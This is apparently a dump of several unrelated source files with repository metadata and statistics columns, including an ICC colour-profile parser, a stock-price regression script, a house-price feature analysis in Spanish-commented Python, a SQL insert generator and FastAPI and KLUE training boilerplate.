node0_input0_model_transformed = model_transformed.find_consumers(
model_transformed.graph.input[0].name
)[0].op_type
node1_input1_model_transformed = model_transformed.find_consumers(
model_transformed.graph.input[1].name
)[0].op_type
assert node0_input0_model != node0_input0_model_transformed
assert node1_input1_model != node1_input1_model_transformed
| 33.968421
| 84
| 0.707468
| 434
| 3,227
| 4.937788
| 0.221198
| 0.027998
| 0.027998
| 0.039664
| 0.344377
| 0.237051
| 0.163322
| 0.094727
| 0.094727
| 0.094727
| 0
| 0.041395
| 0.191509
| 3,227
| 94
| 85
| 34.329787
| 0.779992
| 0.044004
| 0
| 0.027778
| 0
| 0
| 0.06461
| 0
| 0
| 0
| 0
| 0
| 0.041667
| 1
| 0.027778
| false
| 0
| 0.097222
| 0
| 0.138889
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
60e7afd023af256d856d33c530545d41d0b53bb0
| 1,537
|
py
|
Python
|
app/lib/ncr_util.py
|
jchrisfarris/antiope-scorecards
|
82a1e228f4bd23f756c1dec8c0582fcde98de564
|
[
"Apache-2.0"
] | 1
|
2020-09-23T21:40:16.000Z
|
2020-09-23T21:40:16.000Z
|
app/lib/ncr_util.py
|
jchrisfarris/antiope-scorecards
|
82a1e228f4bd23f756c1dec8c0582fcde98de564
|
[
"Apache-2.0"
] | null | null | null |
app/lib/ncr_util.py
|
jchrisfarris/antiope-scorecards
|
82a1e228f4bd23f756c1dec8c0582fcde98de564
|
[
"Apache-2.0"
] | 3
|
2020-07-11T19:18:12.000Z
|
2021-08-14T17:43:06.000Z
|
import json
from lib import authz
from lib.logger import logger
from lib.exclusions import exclusions, state_machine
def get_allowed_actions(user, account_id, requirement, exclusion):
allowed_actions = {
'remediate': False,
'requestExclusion': False,
'requestExclusionChange': False,
}
current_state = exclusions.get_state(exclusion)
valid_state_transitions = state_machine.USER_STATE_TRANSITIONS.get(current_state, {}).keys()
logger.debug('Current state: %s', current_state)
logger.debug('Valid state transitions: %s', str(valid_state_transitions))
logger.debug('User: %s', json.dumps(user))
if authz.can_request_exclusion(user, account_id)[0]:
if set(valid_state_transitions) & set(exclusions.REQUEST_EXCLUSION_STATES):
allowed_actions['requestExclusion'] = True
if set(valid_state_transitions) & set(exclusions.REQUEST_EXCLUSION_CHANGE_STATES):
allowed_actions['requestExclusionChange'] = True
# Determine If can remediate
if can_requirement_be_remediated(requirement):
allowed_actions['remediate'] = authz.can_remediate(user, account_id)[0]
return allowed_actions
def can_requirement_be_remediated(requirement):
"""
Method to validate whether a requirement is capable of being remediated.
:param requirement: The dict representing the requirement to check.
:returns bool: A boolean representing whether requirement can or cannot be remediated.
"""
return 'remediation' in requirement
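# Illustration only (hypothetical requirement dicts, not real scorecard data):
#
#   can_requirement_be_remediated({'remediation': {'worker': 'fix-handler'}})  # -> True
#   can_requirement_be_remediated({'description': 'no automated fix'})         # -> False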
| 37.487805
| 96
| 0.739753
| 180
| 1,537
| 6.094444
| 0.35
| 0.076572
| 0.095716
| 0.025524
| 0.16773
| 0.100273
| 0.100273
| 0.100273
| 0.100273
| 0
| 0
| 0.001576
| 0.174366
| 1,537
| 40
| 97
| 38.425
| 0.862884
| 0.167209
| 0
| 0
| 0
| 0
| 0.125
| 0.035032
| 0
| 0
| 0
| 0
| 0
| 1
| 0.08
| false
| 0
| 0.16
| 0
| 0.32
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
60e862c41a954427496e89a9970f3280bae259e6
| 2,158
|
py
|
Python
|
SentDex/Chapter05.py
|
harimaruthachalam/SentDexChapters
|
b3753ae27b6f965f3611edea9bde2ed5e9478f8f
|
[
"MIT"
] | null | null | null |
SentDex/Chapter05.py
|
harimaruthachalam/SentDexChapters
|
b3753ae27b6f965f3611edea9bde2ed5e9478f8f
|
[
"MIT"
] | null | null | null |
SentDex/Chapter05.py
|
harimaruthachalam/SentDexChapters
|
b3753ae27b6f965f3611edea9bde2ed5e9478f8f
|
[
"MIT"
] | null | null | null |
import quandl
import math
import numpy as np
from sklearn import preprocessing, cross_validation, svm
from sklearn.linear_model import LinearRegression
import pickle
import datetime
from matplotlib import style
import matplotlib.pyplot as plot
# Config
isLoadFromLocal = True
quandl.ApiConfig.api_key = '76eCnz6z9XTH8nfLWeQU'
style.use('ggplot')
# Loading data
if isLoadFromLocal:
df = pickle.load(open("DataFromQuandl_Stock_Chap2.pickle", "rb"))
else:
df = quandl.get('WIKI/GOOGL')
pickle.dump(df, open("DataFromQuandl_Stock_Chap2.pickle", "wb+"))
# Data pre-processing
df['HL_PCT'] = (df['Adj. High'] - df['Adj. Close']) / df['Adj. Close']
df['PCT_Change'] = (df['Adj. Close'] - df['Adj. Open']) / df['Adj. Open']
df = df[['Adj. Close', 'HL_PCT', 'PCT_Change', 'Adj. Volume']]
forecastCol = 'Adj. Close'
df.fillna(-99999, inplace = True)  # numeric sentinel so the columns keep a numeric dtype for scaling
forecastOut = int(math.ceil(0.01*len(df)))
df['label'] = df[forecastCol].shift(-forecastOut)
# df['label'].plot()
# df[forecastCol].plot()
# plot.legend(loc = 4)
# plot.show()
x = np.array(df.drop(['label'], 1))
print(x)
x = preprocessing.scale(x)
print(x)
xLately = x[-forecastOut:]
x = x[:-forecastOut]
df.dropna(inplace = True)
y = np.array(df['label'])
# Regression
x_train, x_test, y_train, y_test = cross_validation.train_test_split(x, y, test_size=0.1)
# classifier = svm.SVR(kernel='linear') # SVM SVR
classifier = LinearRegression(n_jobs=3) # Linear Regression
classifier.fit(x_train, y_train)
accuracy = classifier.score(x_test, y_test)
forecastSet = classifier.predict(xLately)
print('Accuracy is ', accuracy, '\nForecasted values are ', forecastSet, '\nNumber of values is ', forecastOut)
df['Forecast'] = np.nan
lastDate = df.iloc[-1].name
print(lastDate)
lastTime = lastDate.timestamp()
print(lastTime)
oneDay = 24 * 60 * 60 # seconds in a day
nextTime = lastTime + oneDay
for iter in forecastSet:
nextDate = datetime.datetime.fromtimestamp(nextTime)
nextTime += oneDay
df.loc[nextDate] = [np.nan for _ in range(len(df.columns) - 1)] + [iter]
df['Adj. Close'].plot()
df['Forecast'].plot()
plot.legend(loc = 4)
plot.xlabel('Date')
plot.ylabel('Price')
plot.show()
| 26.975
| 111
| 0.70899
| 308
| 2,158
| 4.886364
| 0.412338
| 0.026578
| 0.033223
| 0.02392
| 0.094352
| 0.029236
| 0
| 0
| 0
| 0
| 0
| 0.015401
| 0.127433
| 2,158
| 80
| 112
| 26.975
| 0.783856
| 0.095922
| 0
| 0.036364
| 0
| 0
| 0.175864
| 0.034038
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.163636
| 0
| 0.163636
| 0.090909
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
60e88e1b2de1fea540026e9d706f57f0d6656209
| 7,824
|
py
|
Python
|
tifinity/actions/icc_parser.py
|
pmay/tifinity
|
e004a0e616c7b7455fac6f01ee9acb892cd560c0
|
[
"Apache-2.0"
] | 1
|
2018-05-17T09:48:53.000Z
|
2018-05-17T09:48:53.000Z
|
tifinity/actions/icc_parser.py
|
pmay/tifinity
|
e004a0e616c7b7455fac6f01ee9acb892cd560c0
|
[
"Apache-2.0"
] | 4
|
2018-05-12T10:43:03.000Z
|
2021-02-24T11:17:44.000Z
|
tifinity/actions/icc_parser.py
|
pmay/tifinity
|
e004a0e616c7b7455fac6f01ee9acb892cd560c0
|
[
"Apache-2.0"
] | null | null | null |
class IccProfile():
"""Parses an ICC Colour Profile.
According to spec: all Profile data shall be encoded as big-endian"""
def __init__(self, bytes):
self.header = {}
self.parse_icc(bytes)
def get_colour_space(self):
"""Returns the data colour space type, or None if not defined"""
return self.header.get('data_colour_space')
def tostring(self, limit_value=False):
out = "\nHEADER\n"
for k, v in self.header.items():
out += " [{0:27}]\t{1:31}\n".format(k, v)
out += "\nTAGS ({0})\n".format(self.tag_count)
for tag, (offset, size, value) in self.tags.items():
if len(value)>100 and limit_value:
out += " [{0}]\t{1}\t{2}\t{3}...\n".format(tag, offset, size, value[:100])
else:
out += " [{0}]\t{1}\t{2}\t{3}\n".format(tag, offset, size, value)
return out
def parse_icc(self, bytes):
"""Parsers the specified bytes representing an ICC Profile"""
# ICC profile consists of:
# - 128-byte profile header
# - profile tag table:
# - profile tagged element data (referenced from tag table)
if bytes is not None:
self.read_header(bytes)
self.read_tags(bytes)
def read_header(self, bytes):
self.header['profile_size'] = IccProfile.read_int(bytes, 0)
self.header['preferred_cmm_type'] = IccProfile.read_string(bytes, 4, 4)
self.header['profile_version_number'] = IccProfile.read_binary_coded_decimal(bytes, 8)
self.header['profile_device_class'] = IccProfile.read_string(bytes, 12, 4)
self.header['data_colour_space'] = IccProfile.read_string(bytes, 16, 4)
self.header['pcs'] = IccProfile.read_string(bytes, 20, 4)
self.header['creation_datetime'] = IccProfile.read_datetime(bytes, 24) # YY-mm-dd HH:mm:ss
self.header['acsp'] = IccProfile.read_string(bytes, 36, 4) # Must = acsp
self.header['primary_platform_sig'] = IccProfile.read_string(bytes, 40, 4) # APPL, MSFT, SGI, SUNW, 0
self.header['profile_flags'] = IccProfile.read_int(bytes, 44) # todo: flags
self.header['device_manufacturer'] = IccProfile.read_string(bytes, 48, 4)
self.header['device_model'] = IccProfile.read_int(bytes, 52)
self.header['device_attributes'] = IccProfile.read_int(bytes, 56) # todo: flags
self.header['rendering_intent'] = IccProfile.read_int(bytes, 64)
self.header['nciexyz_values'] = IccProfile.read_xyznumber(bytes, 68)
self.header['profile_creator_signature'] = IccProfile.read_string(bytes, 80, 4)
self.header['profile_id'] = str(bytes[84:100])  # 16-byte profile ID spans bytes 84-99
self.header['reserved'] = str(bytes[100:128])
def read_tags(self, bytes):
# 4 bytes tag count
# n x 12 byte tags (4 bytes sig, 4 bytes offset (relative to profile start), 4 bytes size of data element)
self.tag_count = IccProfile.read_int(bytes, 128)
self.tags = {}
for t in range(self.tag_count):
type = IccProfile.read_string(bytes, 132+(t*12), 4)
offset = IccProfile.read_int(bytes, 136+(t*12))
size = IccProfile.read_int(bytes, 140+(t*12))
read_func = tagtypes.get(type)
if read_func is not None:
#read_func = getattr(IccProfile, tag_tuple[0])
value = read_func(bytes, offset, size)
else:
value = bytes[offset: offset+size]
self.tags[type] = (offset, size, value)
@staticmethod
def read_int(bytes, offset, count=1, size=4, byteorder='big'):
return int.from_bytes(bytes[offset:offset+size], byteorder=byteorder)
@staticmethod
def read_string(bytes, offset, count, byteorder='big'):
return ''.join(map(chr, bytes[offset:offset+count]))
@staticmethod
def read_binary_coded_decimal(bytes, start):
out = "{0}.{1}.{2}".format(bytes[start],
bytes[start+1]>>4,
bytes[start+1]&0x0F)
return out
@staticmethod
def read_datetime(bytes, offset, byteorder='big'):
out = "{0}-{1}-{2} {3}:{4}:{5}".format(str(int.from_bytes(bytes[offset:offset + 2], byteorder=byteorder)),
str(int.from_bytes(bytes[offset + 2:offset + 4], byteorder=byteorder)),
str(int.from_bytes(bytes[offset + 4:offset + 6], byteorder=byteorder)),
str(int.from_bytes(bytes[offset + 6:offset + 8], byteorder=byteorder)),
str(int.from_bytes(bytes[offset + 8:offset + 10], byteorder=byteorder)),
str(int.from_bytes(bytes[offset + 10:offset + 12], byteorder=byteorder)))
return out
@staticmethod
def read_signature_type(bytes, offset, count):
assert (IccProfile.read_string(bytes, offset, 4) == 'sig ')
assert (IccProfile.read_int(bytes, offset + 4) == 0)
return IccProfile.read_string(bytes, offset+8, 4)
@staticmethod
def read_xyztype(bytes, offset, count):
sig = IccProfile.read_string(bytes, offset, 4)
assert(IccProfile.read_int(bytes, offset+4) == 0)
# todo: repeat xyz for remainder of xyztype bytes
xyz = IccProfile.read_xyznumber(bytes, offset+8)
return "{0}: {1}".format(sig, xyz)
@staticmethod
def read_xyznumber(bytes, offset, byteorder='big'):
x_i = IccProfile.read_s15Fixed16Number(bytes, offset)
y_i = IccProfile.read_s15Fixed16Number(bytes, offset+4)
z_i = IccProfile.read_s15Fixed16Number(bytes, offset+8)
return "X={0}, Y={1}, Z={2}".format(x_i, y_i, z_i)
@staticmethod
def read_trctype(bytes, offset, count):
# check first 4 bytes, either 'curv' or 'para'
sig = IccProfile.read_string(bytes, offset, 4)
if sig=='curv':
# next 4 bytes 0
assert (IccProfile.read_int(bytes, offset + 4) == 0)
n = IccProfile.read_int(bytes, offset+8)
vals = [IccProfile.read_int(bytes, offset+12+(2*i), size=2) for i in range(n)]
# todo: para
return "{0} : count {1} : {2}".format(sig, n, vals)
@staticmethod
def read_s15Fixed16Number(bytes, offset):
conv = lambda x: ((x & 0xffff0000) >> 16) + ((x & 0x0000ffff) / 65536)
return conv(int.from_bytes(bytes[offset:offset + 4], byteorder='big'))
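# Worked example: the big-endian bytes 00 01 80 00 decode to 0x00018000; the integer
# part (0x00018000 & 0xffff0000) >> 16 is 1 and the fractional part 0x8000/65536 is 0.5,
# so the s15Fixed16 value is 1.5.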
@staticmethod
def read_s15Fixed16ArrayType(bytes, offset, count):
assert(IccProfile.read_string(bytes, offset, 4) == 'sf32')
assert(IccProfile.read_int(bytes, offset+4) == 0)
n = int((count-8)/4)
return [IccProfile.read_s15Fixed16Number(bytes, offset+8+(i*4)) for i in range(n)]
tagtypes = {
'chad': (IccProfile.read_s15Fixed16ArrayType),
'cprt': (IccProfile.read_string),
'desc': (IccProfile.read_string),
'dmdd': (IccProfile.read_string),
'tech': (IccProfile.read_signature_type),
'vued': (IccProfile.read_string),
'wtpt': (IccProfile.read_xyztype),
'bkpt': (IccProfile.read_xyztype), # private type?
'rTRC': (IccProfile.read_trctype),
'gTRC': (IccProfile.read_trctype),
'bTRC': (IccProfile.read_trctype),
'rXYZ': (IccProfile.read_xyztype),
'gXYZ': (IccProfile.read_xyztype),
'bXYZ': (IccProfile.read_xyztype),
}
if __name__=='__main__':
import numpy as np
import sys
with open(sys.argv[1], 'rb') as file:
data = np.fromfile(file, dtype="uint8")
profile = IccProfile(data)
print(profile.tostring())
| 45.225434
| 121
| 0.597393
| 977
| 7,824
| 4.647902
| 0.216991
| 0.154151
| 0.079278
| 0.067826
| 0.271306
| 0.192248
| 0.135213
| 0.119797
| 0.055494
| 0.039198
| 0
| 0.03747
| 0.266616
| 7,824
| 173
| 122
| 45.225434
| 0.753921
| 0.092664
| 0
| 0.159091
| 0
| 0
| 0.079167
| 0.013313
| 0
| 0
| 0.003399
| 0.00578
| 0.045455
| 1
| 0.121212
| false
| 0
| 0.015152
| 0.015152
| 0.234848
| 0.007576
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
60ead80e847ae9dc084472d4e5417a3a4311cbff
| 9,413
|
py
|
Python
|
analisis_de_variables.py
|
scmarquez/Hause-Price-Kaggle-Competition
|
5fe32fed87a7bf2c6e5f41761ea1c4dd00761f21
|
[
"MIT"
] | null | null | null |
analisis_de_variables.py
|
scmarquez/Hause-Price-Kaggle-Competition
|
5fe32fed87a7bf2c6e5f41761ea1c4dd00761f21
|
[
"MIT"
] | null | null | null |
analisis_de_variables.py
|
scmarquez/Hause-Price-Kaggle-Competition
|
5fe32fed87a7bf2c6e5f41761ea1c4dd00761f21
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
"""
Created on Fri Dec 29 16:40:53 2017
@author: Sergio
"""
# Variable analysis
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import seaborn as sns
from sklearn import ensemble, tree, linear_model
from sklearn.model_selection import train_test_split, cross_val_score
from sklearn.metrics import r2_score, mean_squared_error
from sklearn.utils import shuffle
import warnings
# Ignore warnings
warnings.filterwarnings('ignore')
# Read the data
# train holds the data the model will be trained on
train = pd.read_csv('train.csv')
# test holds the dataset used for testing
test = pd.read_csv('test.csv')
# First, drop the variables with a high number of missing values
# Fraction of missing values for each variable in each set (train and test)
NAs = pd.concat([train.isnull().sum()/1460, test.isnull().sum()/1459], axis=1, keys=['Train', 'Test'])
#print(NAs)
# Drop every variable with more than 20% missing values
eliminar = []
nvars = 0
for index, row in NAs.iterrows():
print(index)
print(row['Test'])
if (row['Test'] > 0.2) or (row ['Train'] > 0.2):
eliminar.append(index)
# `eliminar` holds the names of the variables that must be dropped outright
# Among the variables to drop we find that Alley's NA does not mean unknown; it is just one more of its possible values
# That variable must stay in our dataset
print(eliminar)
eliminar.remove('Alley')
eliminar.remove('FireplaceQu')  # same situation as Alley
train.drop(eliminar,axis=1, inplace=True)
test.drop(eliminar,axis=1, inplace=True)
"""
Ahora es necesario un análisis más profundo de las variables.
En primer lugar encontramos algunas variables que parecen tener una representación
numérica, como por ejemplo 'MSSubClass' o 'OverallCond'.
Al leer la documentación sobre que información aportan las variables
encontramos que OverallCond aunque sea una variable aparentemente nominal
expresa cosas que son medibles como la calidad, es decir muestra una puntuación entre 1 y 10
"""
# Numeric variables that must be converted to string
test['MSSubClass'] = test['MSSubClass'].astype(str)
train['MSSubClass'] = train['MSSubClass'].astype(str)
test['YrSold'] = test['YrSold'].astype(str)
train['YrSold'] = train['YrSold'].astype(str)
#Categorical variables that should be numeric, since they express a score
#It is reasonable to expect that increasing a score has a direct effect on the final price
ExterQualvalues = {'ExterQual':{'Ex':5,'Gd':4,'TA':3,'Fa':2,'Po':1}}
ExterCondvalues = {'ExterCond':{'Ex':5,'Gd':4,'TA':3,'Fa':2,'Po':1}}
BsmQualvalues = {'BsmtQual':{'Ex':5,'Gd':4,'TA':3,'Fa':2,'Po':1}}
BsmCondvalues = {'BsmtCond':{'Ex':5,'Gd':4,'TA':3,'Fa':2,'Po':1,}}
HeatingQCvalues = {'HeatingQC':{'Ex':5,'Gd':4,'TA':3,'Fa':2,'Po':1}}
KitchenQualvalues = {'KitchenQual':{'Ex':5,'Gd':4,'TA':3,'Fa':2,'Po':1}}
FireplaceQuvalues = {'FireplaceQu':{'Ex':5,'Gd':4,'TA':3,'Fa':2,'Po':1}}
GarageCondvalues = {'GarageCond':{'Ex':5,'Gd':4,'TA':3,'Fa':2,'Po':1}}
GarageQualvalues = {'GarageQual':{'Ex':5,'Gd':4,'TA':3,'Fa':2,'Po':1}}
PoolQCvalues = {'PoolQC':{'Ex':4,'Gd':3,'TA':2,'Fa':1}}
#Replace the values in the tables
train.replace(ExterQualvalues,inplace=True)
train.replace(ExterCondvalues,inplace=True)
train.replace(BsmQualvalues,inplace=True)
train.replace(BsmCondvalues,inplace=True)
train.replace(HeatingQCvalues,inplace=True)
train.replace(KitchenQualvalues,inplace=True)
train.replace(FireplaceQuvalues,inplace=True)
train.replace(GarageCondvalues,inplace=True)
train.replace(GarageQualvalues,inplace=True)
train.replace(PoolQCvalues,inplace=True)
test.replace(ExterQualvalues,inplace=True)
test.replace(ExterCondvalues,inplace=True)
test.replace(BsmQualvalues,inplace=True)
test.replace(BsmCondvalues,inplace=True)
test.replace(HeatingQCvalues,inplace=True)
test.replace(KitchenQualvalues,inplace=True)
test.replace(FireplaceQuvalues,inplace=True)
test.replace(GarageCondvalues,inplace=True)
test.replace(GarageQualvalues,inplace=True)
test.replace(PoolQCvalues,inplace=True)
#Now every variable has a 'correct' data type
#Count how many variables of each type we have
train_labels = train.pop('SalePrice')
features = pd.concat([train, test], keys=['train', 'test'])
enteras = features.dtypes[features.dtypes == 'int64'].index
flotantes = features.dtypes[features.dtypes == 'float64'].index
nominales = features.dtypes[features.dtypes == 'object'].index
#Convert to plain lists for later use
ent = []
for var in enteras:
ent.append(var)
flot = []
for var in flotantes:
flot.append(var)
nom = []
for var in nominales:
nom.append(var)
numericas = ent+flot
#Now the missing values of each variable need to be filled in.
"""In some of the variables that were converted to numeric,
NaN does not mean the value is missing; it means a score of 0"""
features['BsmtQual'] = features['BsmtQual'].fillna(0)
features['BsmtCond'] = features['BsmtCond'].fillna(0)
features['FireplaceQu'] = features['FireplaceQu'].fillna(0)
features['GarageQual'] = features['GarageQual'].fillna(0)
features['GarageCond'] = features['GarageCond'].fillna(0)
#The remaining numeric variables can be filled with the mean
for var in numericas:
if features[var].isnull().sum() > 0:
features[var] = features[var].fillna(features[var].mean())
#The remaining nominal variables are filled with the most frequent value
for var in nominales:
if features[var].isnull().sum() > 0:
features[var] = features[var].fillna(features[var].mode()[0])
"""Una vez que la tabla de datos está en el formato correcto vamos a estudiar la correlación
de las variables con el precio. Las variables que presenten una correlación baja se descartarán
ya que lo único que van a hacer es hacer que nuestro modelo se impreciso.
Si se imputan demasiadas variables perderemos información valiosa y el modelo volverá a ser impreciso.
Sacando un Heatmap se puede ver la correlación de las variables"""
#train_labels = np.log(train_labels)#The log transform brings the data closer to a normal distribution
complete = features.loc['train']#Only the training rows are used
complete = pd.concat([complete,train_labels],axis=1)#Re-attach the price column
correlationPlot = complete.corr()#Keep the correlation matrix in a DataFrame
f,ax = plt.subplots(figsize=(12,9))#Figure size configuration
sns.heatmap(correlationPlot,vmax=.8,square=True)#Build the heatmap with the correlation values
plt.yticks(rotation=0)#Rotate the axis labels so they are readable
plt.xticks(rotation=90)#Rotate the axis labels so they are readable
plt.show()#Show the plot
f.savefig('Heatmap.png')#Save the plot to a file
"""La matriz de correlación muestra la correlación entre dos variables de forma que los valores
más claros muestran que dos variables tienen una correlación alta
El siguiente paso del análisis es buscar que variables muestran una correlación alta entre sí y eliminar
una de esas variables, ya que es información redundante y puede eliminarse. Otra manera de enfocar el problema
es que usar dos variables correlacionadas puede ayudar a sofocar el efecto del ruido en una variable.
En primer lugar es necesario descubrir que variables son las que determinan el precio de la vivienda usando la correlación.
"""
#Build the list of variables highly correlated with the house price
"""Inciso:
calcular la correlación antes de aplicar la escala logaritmica a los datos
tiene sentido, pues el coeficiente de correlación de Pearson no varía con
la escala y el origen. Además solo nos sirve para hacer una aproximación
hacia que variables usar o no en el algoritmo. Después si será necesario
hacer que las variables tengan una distribución normalizada.
"""
HighCorrelation = []
for index, row in correlationPlot.iterrows():
if (row['SalePrice'] >= 0.5) or (row ['SalePrice'] <= -0.5):
HighCorrelation.append(index)
print(row['SalePrice'])
print("total de variables: "+str(len(HighCorrelation)))
print(HighCorrelation)
"""Ahora hay que examniar las variables nominales que se tendrán en cuenta
Para hacer este análisis se va a usar una gráfica que exprese la relación entre
el precio y el valor de la vivienda."""
complete = features.loc['train']
complete = pd.concat([complete,train_labels],axis=1)
malas = [#'MSSubClass',
'LandContour',
'LandSlope',
#'RoofStyle',
#'RoofMatl',
'Exterior2nd',
#'Exterior1st',
'MasVnrType',
'BsmtExposure',
'Functional',
'YrSold']
##################################
#malas = ['Utilities', 'RoofMatl','Heating','Functional']
for var in malas:
data = pd.concat([complete[var],complete['SalePrice']],axis=1)
f,ax = plt.subplots(figsize=(12,9))
fig = sns.boxplot(x=var,y="SalePrice",data=data)
fig.axis(ymin=0,ymax=800000)
plt.xticks(rotation=90)
f.savefig(str(var)+'_Price.png')
"""
apparently bad variables:
LandContour
LandSlope
RoofStyle
RoofMatl
Exterior2nd
Exterior1st
MasVnrType
BsmtExposure
Functional
YrSold
"""
"""Analisis con PCA"""
| 41.46696
| 147
| 0.739403
| 1,362
| 9,413
| 5.097651
| 0.307636
| 0.034855
| 0.023765
| 0.031687
| 0.115368
| 0.101829
| 0.093764
| 0.08685
| 0.053147
| 0.053147
| 0
| 0.01572
| 0.141719
| 9,413
| 226
| 148
| 41.650442
| 0.843669
| 0.220227
| 0
| 0.101695
| 0
| 0
| 0.130911
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.076271
| 0
| 0.076271
| 0.050847
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
60eb25016e8dffa48a7ee4e49cffca99635d22f2
| 566
|
py
|
Python
|
query-gen.py
|
mdatsev/prostgres
|
3418258a8b832546ef4d5009867bf1cf79248b7b
|
[
"Unlicense"
] | null | null | null |
query-gen.py
|
mdatsev/prostgres
|
3418258a8b832546ef4d5009867bf1cf79248b7b
|
[
"Unlicense"
] | null | null | null |
query-gen.py
|
mdatsev/prostgres
|
3418258a8b832546ef4d5009867bf1cf79248b7b
|
[
"Unlicense"
] | null | null | null |
import random
import sys
ntables = 100
ncols = 100
nrows = 10000
def printstderr(s):
sys.stderr.write(s + '\n')
sys.stderr.flush()
def get_value():
return random.randint(-99999999, 99999999)
for t in range(ntables):
printstderr(f'{t}/{ntables}')
print(f"create table x ({','.join(['x int'] * ncols)});")
for r in range(nrows):
print(f"insert into _last ({','.join(['x'] * ncols)}) values (", end='')
for c in range(ncols):
print(get_value(), end=('' if c==ncols-1 else ','))
print(');')
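# Example of the generated output (sketch with ncols=3 for brevity; actual runs use ncols=100):
#   create table x (x int,x int,x int);
#   insert into _last (x,x,x) values (-12345678,4567,99999999);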
# 10 min to generate
# 3 min to process
| 21.769231
| 76
| 0.609541
| 85
| 566
| 4.023529
| 0.552941
| 0.061404
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.067834
| 0.19258
| 566
| 26
| 77
| 21.769231
| 0.680525
| 0.061837
| 0
| 0
| 0
| 0
| 0.224953
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.111111
| false
| 0
| 0.111111
| 0.055556
| 0.277778
| 0.333333
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
60ec772a2bff1ce4c7f82d3ad31a4b3889b15287
| 708
|
py
|
Python
|
api/main.py
|
Ju99ernaut/super-fastapi
|
83c232bcaff1006d413a9945ced3ba398b673505
|
[
"MIT"
] | null | null | null |
api/main.py
|
Ju99ernaut/super-fastapi
|
83c232bcaff1006d413a9945ced3ba398b673505
|
[
"MIT"
] | null | null | null |
api/main.py
|
Ju99ernaut/super-fastapi
|
83c232bcaff1006d413a9945ced3ba398b673505
|
[
"MIT"
] | null | null | null |
import uvicorn
from fastapi import FastAPI
from fastapi.middleware.cors import CORSMiddleware
from routes import items
import config
from constants import *
config.parse_args()
app = FastAPI(
title="API",
description="API boilerplate",
version="1.0.0",
openapi_tags=API_TAGS_METADATA,
)
app.add_middleware(
CORSMiddleware,
allow_origins=["*"],
allow_credentials=True,
allow_methods=["*"],
allow_headers=["*"],
)
app.include_router(items.router)
@app.get("/")
async def root():
return {
"docs": "api documentation at /docs or /redoc",
}
if __name__ == "__main__":
uvicorn.run("main:app", host=config.CONFIG.host, port=int(config.CONFIG.port))
| 18.153846
| 82
| 0.686441
| 87
| 708
| 5.37931
| 0.574713
| 0.047009
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.005146
| 0.176554
| 708
| 38
| 83
| 18.631579
| 0.797599
| 0
| 0
| 0
| 0
| 0
| 0.117232
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.214286
| 0
| 0.25
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
60edce602ee84c179651834e36a3725524081131
| 3,522
|
py
|
Python
|
sts/train.py
|
LostCow/KLUE
|
73b1b0526cf6b1b6f5ef535b9527d8abe6ca1a77
|
[
"MIT"
] | 18
|
2021-12-22T09:41:24.000Z
|
2022-03-19T12:54:30.000Z
|
sts/train.py
|
LostCow/KLUE
|
73b1b0526cf6b1b6f5ef535b9527d8abe6ca1a77
|
[
"MIT"
] | null | null | null |
sts/train.py
|
LostCow/KLUE
|
73b1b0526cf6b1b6f5ef535b9527d8abe6ca1a77
|
[
"MIT"
] | 4
|
2021-12-26T11:31:46.000Z
|
2022-03-28T07:55:45.000Z
|
import argparse
import numpy as np
import os
import torch
from transformers import AutoTokenizer, AutoConfig, Trainer, TrainingArguments
from model import RobertaForStsRegression
from dataset import KlueStsWithSentenceMaskDataset
from utils import read_json, seed_everything
from metric import compute_metrics
def main(args):
device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")
config = AutoConfig.from_pretrained(args.model_name_or_path)
config.num_labels = args.num_labels
tokenizer = AutoTokenizer.from_pretrained(args.model_name_or_path)
train_file_path = os.path.join(args.data_dir, args.train_filename)
